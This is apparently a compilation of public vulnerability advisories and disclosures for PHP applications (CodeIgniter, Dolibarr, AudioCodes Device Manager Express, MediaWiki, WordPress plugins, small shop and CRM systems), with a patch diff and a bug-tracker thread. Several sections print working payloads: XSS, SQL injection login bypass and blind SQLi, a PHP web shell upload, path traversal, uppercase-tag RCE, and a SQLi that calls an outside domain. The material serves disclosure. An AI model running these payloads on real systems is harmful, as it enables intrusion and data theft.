A vulnerability, which was classified as problematic, has been found in SourceCodester Students Online Internship Timesheet Syste 1.0. Affected by this issue is some unknown functionality of the file /ajax.php?action=save_company. The manipulation of the argument name with the input <script>alert(document.cookie)</script> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230204.

CVE-2023-2973

The Otter WordPress plugin before 2.2.6 does not sanitize some user-controlled file paths before performing file operations on them. This leads to a PHAR deserialization vulnerability on PHP < 8.0 using the phar:// stream wrapper.

CVE-2023-2288

CodeIgniter is a PHP full-stack web framework. This vulnerability allows attackers to execute arbitrary code when you use Validation Placeholders. The vulnerability exists in the Validation library, and validation methods in the controller and in-model validation are also vulnerable because they use the Validation library internally. This issue is patched in version 4.3.5.


This vulnerability allows attackers to execute arbitrary code when you use Validation Placeholders.

The vulnerability exists in the Validation library, and validation methods in the controller and in-model validation are also vulnerable because they use the Validation library internally.

Upgrade to v4.3.5 or later.

Setting validation rules with an array.

$validation\->setRules(\[
    'email' => \['required', 'valid\_email, 'is\_unique\[users.email,id,{id}\]'\],
\]);

CVE-2023-32692: Remote Code Execution Vulnerability in Validation Placeholders

A vulnerability classified as problematic was found in Bestwebsoft Relevant Plugin up to 1.0.7 on WordPress. Affected by this vulnerability is an unknown functionality of the component Thumbnail Handler. The manipulation leads to information disclosure. The attack can be launched remotely. Upgrading to version 1.0.8 is able to address this issue. The name of the patch is 860d1891025548cf0f5f97364c1f51a888f523c3. It is recommended to upgrade the affected component. The identifier VDB-230113 was assigned to this vulnerability.

@@ -1,7 +1,7 @@ <?php /\* \* Function for displaying BestWebSoft menu \* Version: 1.3.2 \* Version: 1.3.7 \*/  
if ( ! function\_exists( 'bws\_add\_menu\_render' ) ) { Expand Down Expand Up @@ -119,7 +119,7 @@ function bws\_add\_menu\_render() { ), 'google-one/google-plus-one.php' => array( 'name' => 'Google +1', 'description' => 'Allows you to celebrate liked the article.', 'description' => 'Allows you to see how many times your page has been liked on Google Search Engine as well as who has liked the article.', 'link' => 'http://bestwebsoft.com/plugin/google-plus-one/?k=ce7a88837f0a857b3a2bb142f470853c&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version, 'download' => 'http://bestwebsoft.com/plugin/google-plus-one/?k=ce7a88837f0a857b3a2bb142f470853c&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version . '#download', 'wp\_install' => '/wp-admin/plugin-install.php?tab=search&type=term&s=Google+%2B1+bestwebsoft&plugin-search-input=Search+Plugins', Expand Down Expand Up @@ -248,9 +248,34 @@ function bws\_add\_menu\_render() { 'description' => 'Allows to change wordpress user role capabilities.', 'link' => 'http://bestwebsoft.com/plugin/user-role/?k=dfe2244835c6fbf601523964b3f34ccc&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version, 'download' => 'http://bestwebsoft.com/plugin/user-role/?k=dfe2244835c6fbf601523964b3f34ccc&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version . '#download', 'wp\_install' => 'http://bestwebsoft.com/plugin/user-role/?k=dfe2244835c6fbf601523964b3f34ccc&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version . '#download', 'wp\_install' => '/wp-admin/plugin\-install.php?tab=search&s=User+Role+BestWebSoft&plugin-search-input=Search+Plugins', 'settings' => 'admin.php?page=user-role.php', 'pro\_version' => 'user-role-pro/user-role-pro.php' ), 'email-queue/email-queue.php' => array( 'name' => 'Email Queue', 'description' => 'Allows to manage email massages sent by BestWebSoft plugins.', 'link' => 'http://bestwebsoft.com/plugin/email-queue/?k=e345e1b6623f0dca119bc2d9433b130b&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version, 'download' => 'http://bestwebsoft.com/plugin/email-queue/?k=e345e1b6623f0dca119bc2d9433b130b&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version . '#download', 'wp\_install' => '/wp-admin/plugin-install.php?tab=search&s=Email+Queue+BestWebSoft&plugin-search-input=Search+Plugins', 'settings' => 'admin.php?page=mlq\_settings' ), 'limit-attempts/limit-attempts.php' => array( 'name' => 'Limit Attempts', 'description' => 'Allows you to limit rate of login attempts by the ip, and create whitelist and blacklist.', 'link' => 'http://bestwebsoft.com/plugin/limit-attempts/?k=b14e1697ee4d008abcd4bd34d492573a&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version, 'download' => 'http://bestwebsoft.com/plugin/limit-attempts/?k=b14e1697ee4d008abcd4bd34d492573a&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version . '#download', 'wp\_install' => '/wp-admin/plugin-install.php?tab=search&s=Limit+Attempts+BestWebSoft&plugin-search-input=Search+Plugins', 'settings' => 'admin.php?page=limit-attempts.php', 'pro\_version' => 'limit-attempts-pro/limit-attempts-pro.php' ), 'job-board/job-board.php' => array( 'name' => 'Job board', 'description' => 'Allows to create a job-board page on your site.', 'link' => 'http://bestwebsoft.com/plugin/job-board/?k=b0c504c9ce6edd6692e04222af3fed6f&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version, 'download' => 'http://bestwebsoft.com/plugin/job-board/?k=b0c504c9ce6edd6692e04222af3fed6f&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version . '#download', 'wp\_install' => '/wp-admin/plugin-install.php?tab=search&type=term&s=Job+board+BestWebSoft&plugin-search-input=Search+Plugins', 'settings' => 'admin.php?page=job-board.php' ) ); $bws\_plugins\_pro = array( Expand Down Expand Up @@ -305,7 +330,7 @@ function bws\_add\_menu\_render() { ), 'google-one-pro/google-plus-one-pro.php' => array( 'name' => 'Google +1 Pro', 'description' => 'Allows you to celebrate liked the article.', 'description' => 'Allows you to see how many times your page has been liked on Google Search Engine as well as who has liked the article.', 'link' => 'http://bestwebsoft.com/plugin/google-plus-one-pro/?k=f4b0a62d155c9df9601a0531ad5bd832&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version, 'purchase' => 'http://bestwebsoft.com/plugin/google-plus-one-pro?k=f4b0a62d155c9df9601a0531ad5bd832&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version . '#purchase', 'settings' => 'admin.php?page=google-plus-one-pro.php' Expand Down Expand Up @@ -351,6 +376,13 @@ function bws\_add\_menu\_render() { 'link' => 'http://bestwebsoft.com/plugin/sender-pro/?k=dc5d1a87bdc8aeab2de40ffb99b38054&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version, 'purchase' => 'http://bestwebsoft.com/plugin/sender-pro/?k=dc5d1a87bdc8aeab2de40ffb99b38054&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version . '#purchase', 'settings' => 'admin.php?page=sndrpr\_settings' ), 'limit-attempts-pro/limit-attempts-pro.php' => array( 'name' => 'Limit Attempts Pro', 'description' => 'Allows you to limit rate of login attempts by the ip, and create whitelist and blacklist.', 'link' => 'http://bestwebsoft.com/plugin/limit-attempts-pro/?k=9d42cdf22c7fce2c4b6b447e6a2856e0&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version, 'purchase' => 'http://bestwebsoft.com/plugin/limit-attempts-pro/?k=9d42cdf22c7fce2c4b6b447e6a2856e0&pn=' . $bws\_plugin\_info\["id"\] . '&v=' . $bws\_plugin\_info\["version"\] . '&wp\_v=' . $wp\_version . '#purchase', 'settings' => 'admin.php?page=limit-attempts-pro.php', ) );  
Expand Down Expand Up @@ -483,8 +515,8 @@ function bws\_add\_menu\_render() { if ( ( isset( $\_REQUEST\['bwsmn\_form\_submit'\] ) && check\_admin\_referer( plugin\_basename(\_\_FILE\_\_), 'bwsmn\_nonce\_submit' ) ) || ( isset( $\_REQUEST\['bwsmn\_form\_submit\_custom\_email'\] ) && check\_admin\_referer( plugin\_basename(\_\_FILE\_\_), 'bwsmn\_nonce\_submit\_custom\_email' ) ) ) { if ( isset( $\_REQUEST\['bwsmn\_form\_email'\] ) ) { $bwsmn\_form\_email = trim( $\_REQUEST\['bwsmn\_form\_email'\] ); if ( $bwsmn\_form\_email == "" || !preg\_match( "/^((?:\[a-z0-9'\]+(?:\[a-z0-9\\-\_\\.'\]+)?@\[a-z0-9\]+(?:\[a-z0-9\\-\\.\]+)?\\.\[a-z\]{2,5})\[, \]\*)+$/i", $bwsmn\_form\_email ) ) { $bwsmn\_form\_email = esc\_html( trim( $\_REQUEST\['bwsmn\_form\_email'\] ) ); if ( $bwsmn\_form\_email == "" || ! is\_email( $bwsmn\_form\_email ) ) { $error = \_\_( "Please enter a valid email address.", 'bestwebsoft' ); } else { $email = $bwsmn\_form\_email; Expand All @@ -506,19 +538,24 @@ function bws\_add\_menu\_render() { foreach ( $system\_info\['system\_info'\] as $key => $value ) { $message\_text .= '<tr><td>'. $key .'</td><td>'. $value .'</td></tr>'; } $message\_text .= '</table> <h4>Active Plugins</h4> <table>'; foreach ( $system\_info\['active\_plugins'\] as $key => $value ) { $message\_text .= '<tr><td scope="row">'. $key .'</td><td scope="row">'. $value .'</td></tr>'; $message\_text .= '</table>'; if ( ! empty( $system\_info\['active\_plugins'\] ) ) { $message\_text .= '<h4>Active Plugins</h4> <table>'; foreach ( $system\_info\['active\_plugins'\] as $key => $value ) { $message\_text .= '<tr><td scope="row">'. $key .'</td><td scope="row">'. $value .'</td></tr>'; } $message\_text .= '</table>'; } $message\_text .= '</table> <h4>Inactive Plugins</h4> <table>'; foreach ( $system\_info\['inactive\_plugins'\] as $key => $value ) { $message\_text .= '<tr><td scope="row">'. $key .'</td><td scope="row">'. $value .'</td></tr>'; if ( ! empty( $system\_info\['inactive\_plugins'\] ) ) { $message\_text .= '<h4>Inactive Plugins</h4> <table>'; foreach ( $system\_info\['inactive\_plugins'\] as $key => $value ) { $message\_text .= '<tr><td scope="row">'. $key .'</td><td scope="row">'. $value .'</td></tr>'; } $message\_text .= '</table>'; } $message\_text .= '</table></body></html>'; $message\_text .= '</body></html>'; $result = wp\_mail( $email, 'System Info From ' . $home\_url, $message\_text, $headers ); if ( $result != true ) $error = \_\_( "Sorry, email message could not be delivered.", 'bestwebsoft' ); Expand Down Expand Up @@ -578,8 +615,10 @@ function bws\_add\_menu\_render() { </div\> <div class\="bws\_product\_links"\> <a href\="<?php echo $bws\_plugins\_pro\[ $key\_plugin \]\["link"\]; ?>" target\="\_blank"\><?php \_e( "Learn more", 'bestwebsoft' ); ?></a\> <span\> | </span\> <a href\="<?php echo $bws\_plugins\_pro\[ $key\_plugin \]\["settings"\]; ?>" target\="\_blank"\><?php \_e( "Settings", 'bestwebsoft' ); ?></a\> <?php if ( '' != $bws\_plugins\_pro\[ $key\_plugin \]\["settings"\] ) { ?> <span\> | </span\> <a href\="<?php echo $bws\_plugins\_pro\[ $key\_plugin \]\["settings"\]; ?>" target\="\_blank"\><?php \_e( "Settings", 'bestwebsoft' ); ?></a\> <?php } ?> </div\> </div\> <?php } elseif ( isset( $bws\_plugins\[ $key\_plugin \] ) ) { ?> Expand All @@ -605,8 +644,10 @@ function bws\_add\_menu\_render() { </div\> <div class\="bws\_product\_links"\> <a href\="<?php echo $bws\_plugins\[ $key\_plugin \]\["link"\]; ?>" target\="\_blank"\><?php \_e( "Learn more", 'bestwebsoft' ); ?></a\> <span\> | </span\> <a href\="<?php echo $bws\_plugins\[ $key\_plugin \]\["settings"\]; ?>" target\="\_blank"\><?php \_e( "Settings", 'bestwebsoft' ); ?></a\> <?php if ( '' != $bws\_plugins\[ $key\_plugin \]\["settings"\] ) { ?> <span\> | </span\> <a href\="<?php echo $bws\_plugins\[ $key\_plugin \]\["settings"\]; ?>" target\="\_blank"\><?php \_e( "Settings", 'bestwebsoft' ); ?></a\> <?php } ?> </div\> </div\> <?php } Expand Down Expand Up @@ -862,12 +903,14 @@ function bws\_add\_menu\_render() { <table class\="bws\_system\_info"\> <thead\><tr\><th\><?php \_e( 'Active Plugins', 'bestwebsoft' ); ?></th\><th\></th\></tr\></thead\> <tbody\> <?php foreach ( $system\_info\['active\_plugins'\] as $key => $value ) { ?> <tr\> <td scope\="row"\><?php echo $key; ?></td\> <td scope\="row"\><?php echo $value; ?></td\> </tr\> <?php } ?> <?php if ( ! empty( $system\_info\['active\_plugins'\] ) ) { foreach ( $system\_info\['active\_plugins'\] as $key => $value ) { ?> <tr\> <td scope\="row"\><?php echo $key; ?></td\> <td scope\="row"\><?php echo $value; ?></td\> </tr\> <?php } } ?> </tbody\> </table\> <table class\="bws\_system\_info"\> Expand Down

CVE-2014-125102: V1.0.8 - Security Exploit was fixed. Ability to show posts thumbnails. · wp-plugins/relevant@860d189

Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.

**Dolibarr vulnerable to remote code execution via uppercase manipulation**

Moderate severity GitHub Reviewed Published May 29, 2023 to the GitHub Advisory Database • Updated May 30, 2023

GHSA-9wqr-5jp4-mjmh: Dolibarr vulnerable to remote code execution via uppercase manipulation

An issue was discovered in MediaWiki before 1.35.8, 1.36.x and 1.37.x before 1.37.5, and 1.38.x before 1.38.3. Upon an action=rollback operation, the alreadyrolled message can leak a user name (when the user has been revision deleted/suppressed).

**

CVE-2022-41766: On action=rollback the message "alreadyrolled" can leak revision deleted user name

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

*   Create a page with an Rollbacker (but Rollbacker is not Admin)
*   Move the page with MalicousUser (to create a null revision)
*   Revision delete/suppress the user of the null revision
*   Use the rollback from action=history with Rollbacker and the "alreadyrolled" message shows "last edit of MalicousUser" and leak the revdeled user name of the null revision

Good points: The link to action=rollback contains a empty from and does not leak the name.  
Bad points: The rollback link is useless, but provided (thats T6433 for move, but the link is also provided for other null revisions like import or protection) and should not be part of this task

Possible a regression from the refactor in https://gerrit.wikimedia.org/r/c/mediawiki/core/+/675236

*   Task Graph
*   Mentions

**Event Timeline**

Comment Actions

> I am proposing this patch to fix this issue:

+1 just based upon the logic alone. I think we'd want to test this a bit more to see if $userFactory->newFromName( $this->context->msg( 'rev-deleted-user' )->escaped() ); has any unintended consequences. At the very least, MediaWiki doesn't seem to have a problem creating a User object that should work fine:

shell.php

\>>> $userFactory \= \\MediaWiki\\MediaWikiServices::getInstance()->getUserFactory();
\=> MediaWiki\\User\\UserFactory {#3362}

\>>> $revUser \= $userFactory\->newFromName( RequestContext::getMain()->msg( 'rev-deleted-user' )->escaped() );
\=> User {#5855
     +mId: null,
     +mName: "(Username or IP removed)",
     +mActorId: null,
     +mRealName: null,
     +mEmail: null,
     +mTouched: null,
     +mEmailAuthenticated: null,
     +mFrom: "name",
   }

Comment Actions

> I am proposing this patch to fix this issue:

It seems weird to squeeze a message into a User object like that. If the issue is the alreadyrolled message leaking the username, we should have a separate message like alreadyrolled-deleted that doesn't output the username, and use that when necessary. Probably that needs to be done in RollbackPage though.

Comment Actions

The above patch was deployed to wmf.25 and wmf.26 this morning. The patch applied fine and didn't seem to cause any issues within the logs, but likely wouldn't anyways, given the scope of the patch and likely affected users. That being said - if anyone has user-suppress rights on a project and would like to further test, that would be great. This is now being tracked as a deployed patch at T276237 and for the next security release at T311776.

Thanks to @Legoktm and @Krinkle for real-time help with the patch prior to deployment. There are a few cleanup items (spacing, message function, patch subject) that need to be cleaned up prior to release - I'll try to get a refactored patch posted soon. And then as @Legoktm notes above, it might make sense to create a more optimal follow-up patch with a new message, etc.

Comment Actions

Refactored patch:  

Changelog:

1.  Fixed whitespace issues
2.  Condensed comments, changed to // style
3.  Use plain() instead of escaped() for rev-deleted-user message
4.  Added SECURITY: to patch subject line, removed bug id
5.  Slightly changed patch subject text
6.  Added Bug: to commit message

Should now pass gerrit at the very least.

Comment Actions

Patch should be good for REL1\_39 and master, but for REL1\_35, REL1\_37 and REL1\_38, an adjusted patch will be needed due to lack of getAuthority().

Reedy renamed this task from On action=rollback the message "alreadyrolled" can leak revision deleted user name to CVE-2022-41766: On action=rollback the message "alreadyrolled" can leak revision deleted user name.Sep 29 2022, 5:29 PM

Reedy closed this task as Resolved.Sep 29 2022, 5:38 PM

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2022-41766: On action=rollback the message "alreadyrolled" can leak revision deleted user name

An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is directory traversal during file download via the BrowseFiles.php view parameter.

**Full Disclosure mailing list archives**

_From_: Eric Flokstra <erp.flokstra () gmail com>  
_Date_: Fri, 17 Feb 2023 16:06:12 +0100  

\# Product Name: Device Manager Express
# Vendor Homepage: https://www.audiocodes.com
# Software Link:
https://www.audiocodes.com/solutions-products/products/management-products-solutions/device-manager
# Version: <= 7.8.20002.47752
# Tested on: Windows 10 / Server 2019
# Default credentials: admin/admin
# CVE-2022-24627, CVE-2022-24628, CVE-2022-24629, CVE-2022-24630,
CVE-2022-24631, CVE-2022-24632
# Exploit: https://github.com/00xEF/Audiocodes-Device-Manager-Express

AudioCodes' Device Manager Express features a user interface that enables
enterprise network administrators to set up, configure and update up to 500
400HD Series IP phones in globally distributed corporations.

----------------
CVE-2022-24627: An unauthenticated SQL injection exists in the p parameter
of the login form.
----------------
POST /admin/AudioCodes\_files/process\_login.php HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
Content-Type: application/x-www-form-urlencoded

username=admin&password=&domain=&p=%5C%27or+1%3D1%23


----------------
CVE-2022-24628: An authenticated SQL injection exists in the id parameter
of IPPhoneFirmwareEdit.php
----------------
/admin/AudioCodes\_files/IPPhoneFirmwareEdit.php?action=download&id=-1338'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-


----------------
CVE-2022-24629: A remote code execution vulnerability exists via path
traversal in the dir parameter of the file upload functionality .
----------------
POST /admin/AudioCodes\_files/BrowseFiles.php?type= HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="dir"

C:/audiocodes/express/WebAdmin/admin/AudioCodes\_files/ajax/
-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="type"

-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="myfile"; filename="ajaxJabra.php"
Content-Type: application/x-php

<?php echo shell\_exec($\_GET\['x'\]); ?>


-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="Submit"

Upload
-----------------------------119140522224988540294045582807--


----------------
CVE-2022-24630: A remote command execution exists in an undocumented eval
function in BrowseFiles.php
----------------
POST /admin/AudioCodes\_files/BrowseFiles.php?cmd=ssh HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

ssh\_command=dir+C:


----------------
CVE-2022-24631: A Persistent Cross-Site Scripting exists in the desc
parameter in ajaxTenants.php
----------------
POST /admin/AudioCodes\_files/ajax/ajaxTenants.php HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

action=save&id=1&name=Default&desc=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&subnet=&isdefault=true


----------------
CVE-2022-24632: A path traversal vulnerability exists in the view parameter
of the file download functionality in BrowseFiles.php
----------------
/admin/AudioCodes\_files/BrowseFiles.php?view=C:/windows/win.ini
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Multiple vulnerabilities in Audiocodes Device Manager Express** _Eric Flokstra (Feb 22)_

CVE-2022-24632: Multiple vulnerabilities in Audiocodes Device Manager Express

**Swascan Offensive Security Team** has identified a vulnerability on **Dolibarr 17.0.0**. The vulnerability can be tracked with id **CVE-2023-30253**.

The vulnerability has been fixed in **Dolibarr 17.0.1**.

**Product description**

Dolibarr ERP & CRM is a modular software of business management which adapts to the size of the company (SME, Large companies, Frelancers or associations).

**Technical summary**

Swascan’s Offensive Security Team found an important vulnerability on: **17.0.0**

**Vulnerability**

**Tested Vesions**

**CVSSv3.1**            

**CWE-ID**

Authenticated Remote Command Execution

17.0.0

**8.8** High \[AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\]

CWE-77

In the following section the technical details about this vulnerability, including evidence and a proof-of-concept.

**Description**

In Dolibarr 17.0.0 with the CMS Website plugin (core) enabled, an authenticated attacker can obtain remote command execution via php code injection bypassing the application restrictions.

**Proof of Concept**

The following POC shows how to run system commands and the test conditions.

The core plugin CMS Websites is enabled and there is a test user with the following authorizations.

**Figure 1 – test user permissions**

Actually, the test user can’t modify the website with php code (dynamic php code disabled).

**Figure 2 – evidence of the error with php code**

As the Figure 1 shows, the PHP code is flagged as disabled, anyway it’s still possible to inject PHP code as Test user, by tipying “<?**PHP** code…?>” instead of “<?php code..?>”.

The check upon the tag “<?php” can be bypassed by typing it with any character in uppercase (Php, pHp, pHP, PHP).

**Figure 3 – check bypass**

**Figure 4 – php code injected**

The php code has been injected and the page shows the result “4”.

Furthermore, the PHP tag (upper case) also bypass the check on the forbidden php functions in **core/lib/website2.lib.php**.

**Figure 5 – file /usr/share/dolibarr/htdocs/core/lib/website2.lib.php**

**Figure 6 – php code for RCE**

<?PHP echo system(“whoami”).”<br><br>”.system(“pwd”).”<br><br>”.system(“ip a”);?>

**Figure 7 – Remote Command Execution**

In conclusion, with a low privileged user who has access to the websites plugin and **without** the php code permission, it’s poissble to execute command on the remote machine.

**Impact**

An authenticated attacker could obtain access to the remote system and execute arbitrary commands.

**Remediation**

Download latest Dolibarr release from https://www.dolibarr.org/

**References**

*   https://github.com/Dolibarr/dolibarr
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30253
*   https://owasp.org/www-community/attacks/Command\_Injection
*   https://cheatsheetseries.owasp.org/cheatsheets/OS\_Command\_Injection\_Defense\_Cheat\_Sheet.html
*   https://github.com/Dolibarr/dolibarr/releases/tag/17.0.1

****Disclosure Timeline****

*   10-03-2023: Vulnerabilities discovered
*   15-03-2023: Vendor contacted by email
*   22-03-2023: Second attempt by email
*   27-03-2023: Vendor confirmed the vulnerability has been fixed
*   16-05-2023: Vendor release Dolibarr v17.0.1

CVE-2023-30253: Security Advisory: Dolibarr 17.0.0

New MVC Shop version 1.0 suffers from remote SQL injection and missing attribute vulnerabilities.

    ## Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak securityPHPSESSID Hijacking## Author: nu11secur1ty## Date: 05.29.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://portswigger.net/web-security/sql-injection## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\ttq1xmuilflmnv0pcl7cjdwb42avymmdp1koacz.pedal.com\\iqp'))+'was submitted in the User-Agent HTTP header. This payload injects aSQL sub-query that calls MySQL's load_file function with a UNC filepath that references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can retrieve all information from thedatabase of this system.---------------------------------------------------------------------------------------------------------------The following cookie was issued by the application and does not havethe secure flag set:PHPSESSID: The cookie appears to contain a session token, which mayincrease the risk associated with this issue.The malicious user can use one PHPSESSID to connect multiple times onthe system using the same account session.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: User-Agent (User-Agent)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)' AND (SELECT2825 FROM (SELECT(SLEEP(15)))VKYP)-- kuoe---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/new-mvc-shop-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/new-mvc-shop-10-sqli-samesite-attribute.html)## Time spend:00:35:00

New MVC Shop 1.0 SQL Injection / Missing Attributes

Simple Customer Relationship Management CRM 2023 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: SCRMS-2023-05-27-1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 05.27.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `email` parameter appears to be vulnerable to SQL injectionattacks. The test payloads 45141002' or 6429=6429-- and 37491017' or5206=5213-- were each submitted in the email parameter. These tworequests resulted in different responses, indicating that the input isbeing incorporated into a SQL query in an unsafe way. The attacker caneasily steal all users and their passwords for access to the system.Even if they are strongly encrypted this will get some time, but thisis not a problem for an attacker to decrypt if, if they are not enoughstrongly encrypted.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)## Time spend:01:00:00

Tag

#php